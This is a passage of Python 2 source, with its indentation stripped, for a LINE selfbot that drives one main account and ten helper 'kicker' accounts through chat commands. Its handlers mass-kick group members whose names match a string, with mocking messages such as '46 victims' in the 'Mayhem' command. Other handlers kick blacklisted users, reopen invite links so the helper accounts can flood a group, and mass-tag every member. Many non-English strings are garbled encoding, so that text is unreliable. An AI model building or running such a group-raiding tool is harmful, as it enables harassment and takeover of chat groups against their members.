if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif "Id" == msg.text:
cl.sendText(msg.to,msg.to)
elif "Mid all" == msg.text:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
ki2.sendText(msg.to,Bmid)
ki3.sendText(msg.to,Cmid)
ki4.sendText(msg.to,Dmid)
ki5.sendText(msg.to,Emid)
ki6.sendText(msg.to,Fmid)
ki7.sendText(msg.to,Gmid)
ki8.sendText(msg.to,Hmid)
ki9.sendText(msg.to,Imid)
ki10.sendText(msg.to,Jmid)
elif "Mid" == msg.text:
cl.sendText(msg.to,mid)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.text in ["TL:"]:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "MeUp n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("MeUp n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + "Done")
elif "1Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("1Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"name " + string + "Done")
elif "2Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("2Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"name" + string + "Done")
elif "3Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("3Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"name" + string + "Done")
elif "4Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("4Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"name" + string + "Done")
elif "5Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("5Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"name" + string + "Done")
elif "6Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("6Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki6.updateProfile(profile)
ki6.sendText(msg.to,"name" + string + "Done")
elif "7Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("7Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki7.updateProfile(profile)
ki7.sendText(msg.to,"name" + string + "Done")
elif "8Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("8Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki8.updateProfile(profile)
ki8.sendText(msg.to,"name" + string + "Done")
elif "9Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("9Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki9.updateProfile(profile)
ki9.sendText(msg.to,"name " + string + "Done")
elif "10Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("10Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki10.updateProfile(profile)
ki10.sendText(msg.to,"name " + string + "Done")
elif "AllUp n " in msg.text:
string = msg.text.replace("AllUp n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki2.updateProfile(profile)
ki3.updateProfile(profile)
ki4.updateProfile(profile)
ki5.updateProfile(profile)
ki6.updateProfile(profile)
ki7.updateProfile(profile)
ki8.updateProfile(profile)
ki9.updateProfile(profile)
ki10.updateProfile(profile)
ki.sendText(msg.to,"name" + string + "Done")
ki2.sendText(msg.to,"name" + string + "Done")
ki3.sendText(msg.to,"name" + string + "Done")
ki4.sendText(msg.to,"name" + string + "Done")
ki5.sendText(msg.to,"name" + string + "Done")
ki6.sendText(msg.to,"name" + string + "Done")
ki7.sendText(msg.to,"name" + string + "Done")
ki8.sendText(msg.to,"name" + string + "Done")
ki9.sendText(msg.to,"name" + string + "Done")
ki10.sendText(msg.to,"name" + string + "Done")
elif msg.text in ["Mc "]:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#---------------#
elif msg.text in ["AllProtection on"]:
if msg.from_ in Bots or msg.from_ in staff:
if wait["AllProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
wait["Protectguest"] = True
wait["ProtectQR"] = True
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["AllProtection off"]:
if msg.from_ in Bots or msg.from_ in staff:
if wait["AllProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
wait["Protectguest"] = False
wait["ProtectQR"] = False
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["MProtection on"]:
if msg.from_ in Bots or msg.from_ in staff:
if wait["MProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["MProtection off"]:
if msg.from_ in Bots or msg.from_ in staff:
if wait["MProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Blockinvite on","guest on"]:
if msg.from_ in Bots or msg.from_ in staff:
if wait["Protectguest"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block Invitation On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block Invitation On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Blockinvite off","guest off"]:
if msg.from_ in Bots or msg.from_ in staff:
if wait["Protectguest"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Blockinvitation Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Blockinvitation Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qrp on","qr on"]:
if msg.from_ in Bots or msg.from_ in staff:
if wait["ProtectQR"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["ProtectQR"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qrp off","qr off"]:
if msg.from_ in Bots or msg.from_ in staff:
if wait["ProtectQR"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["ProtectQR"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Proc on","proc on"]:
if msg.from_ in Bots or msg.from_ in staff:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel on")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Proc off","proc off"]:
if msg.from_ in Bots or msg.from_ in staff:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["連絡先:オン","K on","Contact on","顯示:開"]:
if msg.from_ in admin or msg.from_ in staff:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["連絡先:オフ","K off","Contact off","顯示:關"]:
if msg.from_ in admin or msg.from_ in staff:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オン","Join on","Auto join:on","自動åƒåŠ ï¼šé–‹"]:
if msg.from_ in admin or msg.from_ in staff:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オフ","Join off","Auto join:off","自動åƒåŠ ï¼šé—œ"]:
if msg.from_ in admin or msg.from_ in staff:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒ç»ã€‚è¦æ—¶å¼€è¯·æŒ‡å®šäººæ•°å‘é€")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°ç»„用自动邀请拒ç»")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin or msg.from_ in staff:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自動退出:關"]:
if msg.from_ in admin or msg.from_ in staff:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin or msg.from_ in staff:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["共有:オフ","Share off","Share off"]:
if msg.from_ in admin or msg.from_ in staff:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["View"]:
md = ""
if wait["MProtection"] == True: md+=" MProtection : on\n"
else: md+=" MProtection : off\n"
if wait["Protectcancel"] == True: md+=" Protect Cancel : on\n"
else: md+=" Protect Cancel : off\n"
if wait["ProtectQR"] == True: md+=" Protect Qr : on\n"
else: md+=" Protect Qr : off\n"
if wait["Protectguest"] == True: md+=" Block Invite : on\n"
else: md+=" Block Invite : off\n"
if wait["contact"] == True: md+=" Contact : on\n"
else: md+=" Contact : off\n"
if wait["autoJoin"] == True: md+=" Auto join : on\n"
else: md +=" Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel : off\n"
if wait["leaveRoom"] == True: md+=" Auto leave : on\n"
else: md+=" Auto leave : off\n"
if wait["timeline"] == True: md+=" Share : on\n"
else:md+=" Share : off\n"
if wait["autoAdd"] == True: md+=" Auto add : on\n"
else:md+=" Auto add : off\n"
if wait["commentOn"] == True: md+=" Comment : on\n"
else:md+=" Comment : off\n"
if wait["atjointicket"] == True: md+=" Auto Join Group by Ticket : on\n"
else:md+=" Auto Join Group by Ticket : off\n"
cl.sendText(msg.to,md)
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "album remove " in msg.text:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id","群組全id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin or msg.from_ in staff:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif "album remove→" in msg.text:
gid = msg.text.replace("album remove→","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•候語確èª"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é 留言:開"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["コメント:オフ","Comment on","Comment off","自動首é 留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["Comment","留言確èª"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Jam on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Jam off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif msg.text in ["Change clock "]:
n = msg.text.replace("Change clock ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Jam Update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
elif msg.text == "$set":
cl.sendText(msg.to, "Check sider")
ki.sendText(msg.to, "Check sider")
kk.sendText(msg.to, "Check sider")
kc.sendText(msg.to, "Check sider")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "$read":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "People who readed %s\nthat's it\n\nPeople who have ignored reads\n%sIt is abnormal ♪\n\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "An already read point has not been set.\n「set」you can send ♪ read point will be created ♪")
#-----------------------------------------------
#-----------------------------------------------
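# "Join"/"All": briefly re-open the group's ticket link so helper accounts can join, then lock it again.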
elif msg.text in ["Join","one","One"]:
if msg.from_ in admin or msg.from_ in Bots:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "kicker ok"
elif msg.text in ["All","masuk"]:
if msg.from_ in Bots or msg.from_ in staff:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif msg.text in ["Bye wm"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
ki7.leaveGroup(msg.to)
ki8.leaveGroup(msg.to)
ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Bye"]:
if msg.from_ in Bots or msg.from_ in staff:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
ki7.leaveGroup(msg.to)
ki8.leaveGroup(msg.to)
ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
#------------- Tag-all users start ---------------#
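# Builds one message of "@x" placeholders; the MENTION contentMetadata JSON maps each placeholder's start/end offsets in msg.text to a member mid.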
elif msg.text in ["tagall","Tag all"]:
group = cl.getGroup(msg.to)
jw = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for rs in jw:
xname = cl.getContact(rs).displayName
xlen = int(len('x')+1)
akh = akh + xlen
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(rs)+"},"""
strt = strt + int(len('x')+3)
akh = akh + 2
cb2 += "@x \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
#-----------------------------------------------
elif msg.text in ["Kill"]:
if msg.from_ in Bots or msg.from_ in staff:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Sorry!!")
ki2.sendText(msg.to,"(´・ω・`)")
return
for jj in matched_list:
try:
klist=[ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#---------------kickall started----------------#
elif "Mayhem" in msg.text:
if msg.from_ in Bots or msg.from_ in staff:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Mayhem","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
#gs = ki4.getGroup(msg.to)
#gs = ki5.getGroup(msg.to)
ki.sendText(msg.to,"「 Mayhem 」\nMayhem is STARTING♪\n abort to abort♪")
ki2.sendText(msg.to,"「 Mayhem 」\n46 victims shall yell hul·la·ba·loo♪\nhələbəˈlo͞o hələbəˌlo͞o")
ki3.sendText(msg.to,"Good Bye (*´・ω・*)")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to,"Not Found")
else:
for target in targets:
if target not in Bots and target not in staff:
try:
klist=[ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki3.sendText(msg.to,"Mayhem done")
#----------------kickall finish----------------------#
elif "Kickuk" in msg.text:
if msg.from_ in admin or msg.from_ in staff:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Kickuk","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
#ki.sendText(msg.to,"Just some casual cleansing ô")
#ki2.sendText(msg.to,"Group cleansed.")
#ki3.sendText(msg.to,"Fuck You All")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found.")
ki2.sendText(msg.to,"Not found.")
ki3.sendText(msg.to,"Not found.")
else:
for target in targets:
if target not in Bots and target not in admin:
try:
klist=[ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki.sendText(msg.to,"Group cleanse")
ki2.sendText(msg.to,"Group cleanse")
ki3.sendText(msg.to,"Group cleanse")
elif "Nk " in msg.text:
if msg.from_ in Bots or msg.from_ in staff:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
klist=[cl,ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki.sendText(msg.to,"Sorry...")
ki3.sendText(msg.to,"(´・ω・`)")
elif "Blacklist @ " in msg.text:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
k3.sendText(msg.to,"Succes ")
except:
ki.sendText(msg.to,"error")
elif "Banned @" in msg.text:
if msg.from_ in Bots or msg.from_ in staff:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
